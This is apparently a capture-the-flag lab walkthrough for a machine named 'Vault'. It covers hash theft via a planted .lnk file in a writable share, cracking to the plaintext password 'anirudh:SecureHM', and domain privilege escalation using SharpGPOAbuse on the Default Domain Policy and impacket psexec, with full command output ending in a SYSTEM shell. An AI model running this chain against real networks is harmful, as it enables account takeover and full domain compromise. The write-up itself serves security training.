Skip to content

Vault 🔺

Enumeration

Using --rid force we have the users and groups

There is a writable folder DocumentsShare so we can put a lnk file pointing to our smb2 server to get hashes using ntml_theft

Using hashcat

anirudh:SecureHM

Initial Access

Get the flag

Privilege Escalation

Using bloodhound-python we notice that the user has writedacl permissions

We can use SharpGPOAbuse.exe to add ourselves to admin group

*Evil-WinRM* PS C:\Users\anirudh\Documents> ./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
[+] Domain = vault.offsec
[+] Domain Controller = DC.vault.offsec
[+] Distinguished Name = CN=Policies,CN=System,DC=vault,DC=offsec
[+] SID Value of anirudh = S-1-5-21-537427935-490066102-1511301751-1103
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\vault.offsec\SysVol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
*Evil-WinRM* PS C:\Users\anirudh\Documents>

Reenter with psexec and

$ python3 /usr/share/doc/python3-impacket/examples/psexec.py vault.offsec/anirudh:SecureHM@192.168.120.116
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 192.168.120.116.....
[*] Found writable share ADMIN$
[*] Uploading file WGPlQkwE.exe
[*] Opening SVCManager on 192.168.120.116.....
[*] Creating service LVYv on 192.168.120.116.....
[*] Starting service LVYv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

Post Exploitation

Get the flag